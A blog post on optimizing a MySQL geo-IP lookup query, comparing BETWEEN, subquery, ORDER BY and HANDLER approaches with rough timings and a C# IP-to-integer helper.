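Remember that a filter also has to be enabled per session before it takes effect, e.g. `session.EnableFilter("CultureFilter").SetParameter("Culture", 1);`.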

There is a much better i18n alternative solution though, which I will write about later.


Optimizing Geo IP Search with BETWEEN in MySQL

12 March, 2010

One of the projects I've been working on had a serious performance issue: one page would take at least 600 ms to load, which made the website completely unresponsive whenever 4 or more requests arrived within a second. A quick code review (the website was written in PHP using Smarty) revealed one function causing most of the trouble. The function did a pretty simple thing: it determined the visitor's city from his IP address. When I looked closer, I came across this query:

SELECT b.*, r.reg_center
FROM counter_cities AS b
LEFT JOIN regions AS r ON r.id = b.region_id -- assumed join column
WHERE (1040552673 BETWEEN b.first_long_ip AND b.last_long_ip)
ORDER BY b.id DESC
LIMIT 1;

Now, id and (first_long_ip, last_long_ip) are the indexes, just as recommended by the MySQL docs. So the query was very fast for some IP addresses. Unfortunately, the same query took almost 600 ms when the address was not in the table, or when it was closer to the end of the table: a full table scan was being performed.
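As an aside, the first_long_ip and last_long_ip columns presumably hold IPv4 addresses converted to 32-bit integers (what PHP's ip2long() or MySQL's INET_ATON() produce), which is what makes the BETWEEN comparison possible in the first place. A minimal sketch of that conversion:

```csharp
// Convert a dotted-quad IPv4 address to the 32-bit integer form
// stored in first_long_ip / last_long_ip.
static uint IpToLong(string ip)
{
    var parts = ip.Split('.');
    return (uint.Parse(parts[0]) << 24)
         | (uint.Parse(parts[1]) << 16)
         | (uint.Parse(parts[2]) << 8)
         |  uint.Parse(parts[3]);
}
// IpToLong("62.5.146.225") == 1040552673, the constant in the query above
```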


Let's try to understand what is going on here:

ORDER BY /* executed first almost immediately */
LEFT JOIN /* can be ignored from performance point of view */
WHERE ... BETWEEN /* is using the indexed key, so should be taking no time at all (or so I thought) */
LIMIT 1 /* is pulling the first result from the result set */

Well, the intentions of the developer were quite honest, and from his point of view the query should have been using the indexes. But in reality ORDER BY ... DESC LIMIT 1 forces MySQL to apply the WHERE clause to only one row at a time, making the condition useless. This can be seen in the EXPLAIN output as the "rows" column goes down to 2 while "filtered" goes up to a huge number (which doesn't make sense, unless you consider that it is actually a sum of the percentages of the rows filtered on each application of the condition).

So there are a lot of possible ways to optimize this query. Now that we know that ORDER BY ... LIMIT affects how the result is actually found, we can do the simplest thing and rewrite it as:

SELECT * FROM (
    SELECT b.*
    FROM counter_cities AS b
    WHERE 2580423488 >= b.first_long_ip AND 2580423488 <= b.last_long_ip
) AS c
ORDER BY c.id DESC
LIMIT 1;

This query will run in 40-50 ms for any address, in or outside of the table.

Faster, we need to go faster!

But we can go further and use our indexes to the fullest extent. If we assume that ORDER BY is executed before everything else, then we can help MySQL greatly by doing the following:

SELECT *
FROM counter_cities
WHERE (3647675904 BETWEEN first_long_ip AND last_long_ip)
ORDER BY first_long_ip DESC
LIMIT 1;

This query will run in <1 ms with any ip address that is in the range of our table. The downside here is that ip addresses outside of this range will require a full table scan, which is unacceptable for a local website.

Extreme solution

HANDLER counter_cities OPEN AS a; 
HANDLER a READ long_ip <= (3647675904); 
HANDLER a CLOSE; 

Where long_ip is the name of the key on (first_long_ip, last_long_ip). If we order the table by id DESC, first_long_ip DESC, then the result is guaranteed to be equal to our original query. Now if X is not in the range of the table, we just have to check that last_long_ip is greater than X; if it's not, then X is definitely outside of the range and we don't need to look any further. This is not very elegant though, and you will have to re-sort the table on each insert or update. But this query will be extremely fast in all cases.

Real-world conclusion

Unfortunately, none of these (and some other) optimized queries ever made it onto the server, because the developer in charge insisted on testing the queries on the production server (yep, the same server executing 600 ms long queries every few seconds) and basing his decisions on those results. Of course, the results were as good as completely random.
